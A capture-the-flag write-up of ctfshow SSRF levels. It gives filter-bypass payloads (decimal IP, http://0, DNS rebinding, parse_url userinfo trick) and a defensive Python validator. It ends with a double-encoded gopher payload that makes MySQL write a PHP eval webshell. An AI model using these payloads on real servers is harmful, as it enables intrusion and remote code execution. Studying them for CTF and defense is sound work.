A Brief Look at SSRF Vulnerabilities
SSRF Explained
SSRF (Server-Side Request Forgery) is a vulnerability in which an attacker crafts a request that the server then issues on the attacker's behalf. In most cases the target of an SSRF attack is an internal system that cannot be reached from the public internet.
flag.php can be opened, but it responds that non-local users are forbidden, so SSRF is used to fetch it from localhost:
url=http://localhost/flag.php
Still flag.php, but 127.0.0.1 and localhost are now filtered. Write the IP as a single decimal integer instead (any online IP-to-integer / integer-to-IP converter will do):
url=http://2130706433/flag.php
/localhost|127\.0\.|\。/i
This does not affect the previous payload:
url=http://2130706433/flag.php
/localhost|1|0|。/
This one specifically filters the digits 1 and 0.
Find a domain whose A record points to 127.0.0.1 (http://sudo.cc/) and substitute that domain for the host in the payload URL:
url=http://sudo.cc/flag.php
This level requires strlen($host) <= 5.
While searching Baidu for other ways to write 127.0.0.1, I came across an article on the difference between the local IP, 127.0.0.1 and 0.0.0.0.
Since the all-zeros address stands for "any host", I wanted to see whether a bare 0 could stand in for 0.0.0.0.
Opening http://0/ locally redirected me to https://0.0.0.0/,
so it should work; I built the payload and it succeeded:
url=http://0/flag.php
This time the limit is strlen($host) <= 3, so the payload above still fits:
url=http://0/flag.php
<?php
error_reporting(0);
highlight_file(__FILE__);
$url = $_POST['url'];
$x = parse_url($url);
if ($x['scheme'] === 'http' || $x['scheme'] === 'https') {
    // the host is resolved once here, only for the check ...
    $ip = gethostbyname($x['host']);
    echo ''.$ip.'';
    if (!filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) {
        die('ip!');
    }
    // ... and resolved a second time by file_get_contents, which may get a different answer
    echo file_get_contents($_POST['url']);
} else {
    die('scheme');
}
About the flags used in the if check (the full set filter_var accepts with FILTER_VALIDATE_IP):
- FILTER_FLAG_IPV4 - requires the value to be a valid IPv4 address
- FILTER_FLAG_IPV6 - requires the value to be a valid IPv6 address
- FILTER_FLAG_NO_PRIV_RANGE - fails if the value is in an RFC-specified private range (e.g. 192.168.0.1)
- FILTER_FLAG_NO_RES_RANGE - fails if the value is in a reserved IP range. This flag accepts IPv4 and IPv6 values.
DNS rebinding (DNS-Rebinding): the host is resolved once for the filter_var check and again inside file_get_contents, so a name that answers differently on each lookup passes the check with a public IP and is then fetched from 127.0.0.1. Reference: 浅谈DNS重绑定漏洞.
Register an account at http://ceye.io/; after logging in you will see that a domain has been assigned to you.
Add one DNS Rebinding record for an arbitrary IP and a second one for 127.0.0.1; otherwise the payload just comes back with "127.0.0.1 ip!".
Then POST (remember to prefix the assigned domain with r.):
url=http://r.xxxxxx.ceye.io/flag.php
Repeat the POST a few times until one of them goes through.
<?php
error_reporting(0);
highlight_file(__FILE__);
$url = $_POST['url'];
$x = parse_url($url);
// the regex is applied to the raw URL string, not to the host parse_url extracts
if (preg_match('/^http:\/\/ctf\..*show$/i', $url)) {
    echo file_get_contents($url);
}
This level tests a parse_url parsing quirk (reference: parse_url小结): the regex only requires the raw string to start with http://ctf. and end with show, so ctf. can be the userinfo part before an @ while the real host is 0, and the trailing show is just the query string:
http://ctf.@0/flag.php?show
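A defender-side validator that closes the three holes walked through above (numeric hosts such as 2130706433 and 0, the userinfo trick in ctf.@0, and the double resolution that DNS rebinding exploits). This is added example code, not part of the original writeup or of ctfshow; the hostname r.example.ceye.io and the IP 93.184.216.34 are constructed, and the resolver parameter is a hypothetical hook so the logic can be exercised without live DNS.

```python
import ipaddress, re, socket
from urllib.parse import urlsplit

# One component of the legacy inet_aton() syntax: decimal, octal (leading 0) or hex (0x)
_PART = r"(?:0[xX][0-9a-fA-F]+|0[0-7]*|[1-9][0-9]*)"
_LEGACY = re.compile(rf"^{_PART}(?:\.{_PART}){{0,3}}$")

def _component(p):
    if p[:2].lower() == "0x":
        return int(p, 16)
    return int(p, 8) if len(p) > 1 and p[0] == "0" else int(p)

def legacy_ipv4(host):
    """Dotted quad for inet_aton-style hosts ('2130706433', '0', '127.1', '0x7f.1'), else None."""
    if not _LEGACY.match(host):
        return None
    *lead, last = [_component(p) for p in host.split(".")]
    # the last component fills every byte the leading ones did not cover
    if any(p > 255 for p in lead) or last >= 256 ** (4 - len(lead)):
        return None
    value = last
    for i, p in enumerate(lead):
        value |= p << (8 * (3 - i))
    return str(ipaddress.IPv4Address(value))

def pinned_target(url, resolver=socket.gethostbyname):
    """Return the single public IP the caller must connect to, or raise ValueError."""
    u = urlsplit(url)
    if u.scheme not in ("http", "https"):
        raise ValueError("scheme")
    host = u.hostname  # userinfo is dropped, so 'http://ctf.@0/' yields host '0'
    if not host:
        raise ValueError("host")
    try:
        ip = ipaddress.ip_address(legacy_ipv4(host) or host)
    except ValueError:
        ip = ipaddress.ip_address(resolver(host))  # resolve once; a rebinding name gets no second query
    if ip.version == 6 and ip.ipv4_mapped:
        ip = ip.ipv4_mapped  # ::ffff:127.0.0.1 is still loopback
    if not ip.is_global:  # loopback, 0.0.0.0, RFC 1918, link-local, CGNAT, ...
        raise ValueError("ip!")
    return str(ip)  # connect to this address; never re-resolve the hostname

def is_blocked(url, resolver=socket.gethostbyname):
    try:
        pinned_target(url, resolver)
        return False
    except ValueError:
        return True
```

The caller must open the connection to the returned address (and send the original Host header) rather than handing the URL to a fetch function that resolves the name again.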
Attacking a password-less MySQL
Here I used gopherus (https://github.com/tarunkant/Gopherus), a tool I had used before when doing code audits,
to write a one-line webshell.
Then look for the parameter the payload can be sent through.
One catch: everything after gopher://127.0.0.1:3306/_ has to be URL-encoded a second time; I just did it with find-and-replace in Notepad (replacing % with %25).
gopher://127.0.0.1:3306/_%25a3%2500%2500%2501%2585%25a6%25ff%2501%2500%2500%2500%2501%2521%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2572%256f%256f%2574%2500%2500%256d%2579%2573%2571%256c%255f%256e%2561%2574%2569%2576%2565%255f%2570%2561%2573%2573%2577%256f%2572%2564%2500%2566%2503%255f%256f%2573%2505%254c%2569%256e%2575%2578%250c%255f%2563%256c%2569%2565%256e%2574%255f%256e%2561%256d%2565%2508%256c%2569%2562%256d%2579%2573%2571%256c%2504%255f%2570%2569%2564%2505%2532%2537%2532%2535%2535%250f%255f%2563%256c%2569%2565%256e%2574%255f%2576%2565%2572%2573%2569%256f%256e%2506%2535%252e%2537%252e%2532%2532%2509%255f%2570%256c%2561%2574%2566%256f%2572%256d%2506%2578%2538%2536%255f%2536%2534%250c%2570%2572%256f%2567%2572%2561%256d%255f%256e%2561%256d%2565%2505%256d%2579%2573%2571%256c%2547%2500%2500%2500%2503%2573%2565%256c%2565%2563%2574%2520%2527%253c%253f%2570%2568%2570%2520%2565%2576%2561%256c%2528%2524%255f%2550%254f%2553%2554%255b%2531%255d%2529%253b%2520%253f%253e%2527%2520%2569%256e%2574%256f%2520%256f%2575%2574%2566%2569%256c%2565%2520%2527%252f%2576%2561%2572%252f%2577%2577%2577%252f%2568%2574%256d%256c%252f%2531%252e%2570%2568%2570%2527%253b%2501%2500%2500%2500%2501
Then send it through returl.
web360 targets Redis instead; just change the mysql at the end of the tool's command to redis.
Remember to URL-encode it once more.